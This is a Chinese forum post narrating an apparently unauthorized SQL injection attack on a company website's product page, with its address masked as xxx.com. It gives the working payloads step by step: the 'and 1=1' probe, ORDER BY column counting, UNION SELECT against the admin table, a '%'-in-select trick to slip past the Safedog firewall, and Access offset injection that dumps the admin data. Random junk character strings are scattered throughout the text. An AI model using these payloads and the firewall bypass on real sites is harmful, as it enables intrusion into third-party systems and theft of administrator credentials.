打开网站,一个企业站。
- t3 x; f: [) P$ @6 V
/ t- X$ ] u* g, W% F
8 a6 y. t' w9 b5 n1 M顺手加个admin
7 Y! {4 V. u2 S& i
5 v- P- f( G, h; e: v7 `8 o! ~! B( u
默认后台。/ Y( q! m% Z, }- m" A, ~1 }5 L1 ]
回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。8 z9 c! H5 y5 d T$ k
$ O5 T' b5 H2 Q7 X& v/ L/ Z3 \
+ X; \9 x8 D0 z5 @% ?; \ `/ _( D V }! w: X0 N
所以就不用御剑扫了,待会直接封IP。
/ w6 Z h0 s9 i3 _* x B+ M
! A& C" i: a6 a% Z用order by语句判断是否存在注入。6 ~/ F6 O7 j" y l# f
http://www.xxx.com /product_show.asp?id=997 order by 1
: _1 c8 w* v; M. M% S" @, T! lhttp://www.xxx.com /product_show.asp?id=997 order by 100% w o. V e4 B& k
现在存在注入,经测试后发现是9个字段。
! Z- Y# L9 z! d! J- f& O% V# b z7 d9 i, U5 Z6 R: k; v$ h3 ~
接下来进行联合查询,猜是否存在admin表。
5 t1 @% N% q0 E: k& f4 Rhttp://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。 n+ V$ o+ B0 w* ?
P- E0 D" h5 |$ f( J7 W# M
( n+ c6 v+ r+ X/ Q
& r- W9 k) }- ~ O- e在select中间加个%,se%lect绕过安全狗。9 m2 b, v3 V: t: D$ {
7 E) _1 B: w8 Y" ~
5 ]3 Z5 ^$ ~+ a) C+ ~发现存在admin表,然后开始手工猜常用的字段。
3 \) V+ ]" }% f+ K1 J( _ R1 u纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
# |/ b/ [! q5 n2 c" i 6 K7 e5 m6 m& x1 G( k' F
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。5 f7 t0 y, e2 o
* S1 ^" W5 q) M& x+ n科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
; t6 z" G9 z- W9 s- q9 Q4 n! Uhttp://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
/ v; |0 b ~1 [6 C$ f6 d" t$ F好了,敏感内容出显了。
4 T' ]; i$ S+ z7 V7 B
. q7 p* l, s/ O0 a# K7 S0 ~' T/ _8 ^, _! y
6 j/ ^$ y4 d, m, Z |